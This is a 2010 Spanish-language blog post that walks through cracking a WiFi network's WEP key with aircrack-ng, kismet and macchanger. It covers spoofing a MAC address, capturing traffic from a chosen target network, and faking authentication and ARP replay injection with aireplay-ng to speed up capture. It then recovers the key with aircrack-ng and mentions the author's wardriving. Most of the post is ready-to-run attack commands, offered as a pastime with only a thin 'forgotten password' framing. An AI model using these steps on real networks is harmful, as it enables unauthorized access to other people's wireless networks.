miércoles, 18 de agosto de 2010

Jugando con Aircrack-ng , kismet y Macchanger

Si te olvidaste tu contraseña o tienes ganas de jugar con tu router wifi, hoy comienzo una nueva forma de pasar el tiempo.. En este post hablaremos de como usar las herramientas mas comunes para poder recuperar una clave wep y wpa.
También algunos comandos básicos y conceptos generales para poder llevar a cabo esta practica.
Para empezar una breve descripcion acerca de Aircrack-ng

Aircrack-ng es una herramienta para el  craqueo, que puede recuperar claves con los paquetes de datos capturados. Implementa el ataque estándar FMS con algunas optimizaciones como ataques Korek, así como el ataque PTW totalmente nuevo, lo que hace el ataque mucho más rápido comparado con otras herramientas de cracking WEP. El macchanger sirve naturalmente para cambiar nuesto direccion de mac, y el kismet para realizar un buen espectro de wifi presentes inclusive en conjunto con un Gps.
Para instalarlos  se utilizan los siguientes comandos:

sudo apt-get install aircrack-ng
sudo apt-get install macchanger
sudo apt-get install kismet

airmon-ng

Nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, wlan1,)

airmon-ng stop wlan1

monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.

ifconfig wlan1 down

Tarjeta de red desactiva: no sale nada por pantalla.

macchanger –mac 00:11:22:33:44:55 wlan1

Current mac: xx:xx:xx:xx:xx:xx    Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes.

airmon-ng start wlan1

Monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes)

Se necesita una placa de Wifi que contenga un chipset capaz de ponerse en modo promiscuo o de escucha.

Mi chipset preferido es el de realteak 8187, si bien a veces se cuelga parece ser bastante estable.
Aun asi les dejos este pequeño texto, lo guardas y lo ejecutas cuando se te cuelgue. Basicamente lo que hace es  Recargar los modulos. Esto tambien es util para cuando usamos otro tipo de herramienta
tipo Gerix o Wifite

Script:

 #!/bin/bashecho Remove RTL8187 Module
rmmod rtl8187
rfkill block all
rfkill unblock all
echo Add RTL818& Module
modprobe rtl8187
rfkill unblock all
echo Bring wlan0 Up
ifconfig wlan0 up


 Escaneo de redes y clientes asociados

airodump-ng wlan1

redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR) apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal.

airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID wlan1

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado:   airodump-ng -c 11 -w capturaswifi  – - bssid 00:01:02:03:04:C1

Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!!

Inyección de paquetes para agilizar el proceso de capturas de paquetes

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID wlan1

Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID.  Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED wlan1.

aireplay-ng -3 –b BSID –h 00:11:22:33:44:55  wlan1

Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55  wlan1. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!!

Crackeo WEP

Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.

Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos.

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aircrack-ng –b BSSID ArchivoDeCapturas.cap

Clave WEP encontrada/no encontrada

El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.

Algunas imagenes de Kismet:














Actualizacion: les dejo un link del diario clarín donde aparecemos haciendo un poco de wardriving en un trensito de la alegría.

http://www.clarin.com/sociedad/Persiguiendo-Wi-Fi-calles-Buenos-Aires_0_559144325.html



No hay comentarios:

Publicar un comentario